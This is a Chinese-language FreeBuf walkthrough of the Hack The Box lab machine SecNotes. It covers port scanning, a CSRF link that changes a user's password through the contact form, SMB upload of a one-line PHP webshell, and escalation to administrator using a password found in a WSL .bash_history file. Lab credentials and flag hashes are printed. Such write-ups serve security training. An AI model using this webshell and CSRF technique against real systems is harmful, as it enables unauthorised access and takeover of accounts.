freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Webshell上传+Linux子系统命令历史记录泄露权限提...
2024-08-29 10:54:27

信息收集

IP AddressOpening Ports
10.10.10.97TCP:80,445,8808

$ nmap -p- 10.10.10.97 --min-rate 1000 -sC -sV

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

XSRF & SMB Webshell

1.创建用户

http://10.10.10.97/register.php

image-1.png

2.登录

image.png

3.联系页面

image-2.png

image-3.png

http://10.10.16.24/test

image-4.png

联系页面提交URL后靶机会自动访问该链接

4.修改密码

修改密码页面可以通过GET请求进行修改密码,并且不需要提供原始密码

image-6.png

image-5.png

5.在反馈联系页面发送链接,让tyler@secnotes.htb靶机访问触发XSRF漏洞

http://10.10.10.97/change_pass.php?password=test123&confirm_password=test123&submit=submit

image-7.png

image-8.png

存在SMB凭证,通过SMB上传webshell

\\secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*&

$ smbmap -H 10.10.10.97 -u tyler -p '92g!mA8BGjOirkL%OG*&'

image-9.png

$ smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site

image-10.png

$ echo '<?php system($_GET[1]); ?>'>/tmp/shell.php

smb: \> put /tmp/shell.php shell.php

$ curl 'http://10.10.10.97:8808/shell.php?1=whoami'

image-11.png

User.txt

c820c9c749a18ad20cd753302bcde81d

权限提升

image-12.png

PS C:\inetpub\new-site> type C:\Users\tyler\Desktop\bash.lnk

image-13.png

PS C:\inetpub\new-site> \windows\system32\bash.exe

PS C:\inetpub\new-site> Get-ChildItem -Recurse -Path C:\ -Filter "bash.exe"

image-14.png

PS C:\inetpub\new-site> cd C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root

PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history

从Linux子系统中的.bash_history中获取到管理员密码

image-15.png

$ winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

image-17.png

Root.txt

da93ba016133741828c0cd57abb916ad

# web安全 # CTF
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录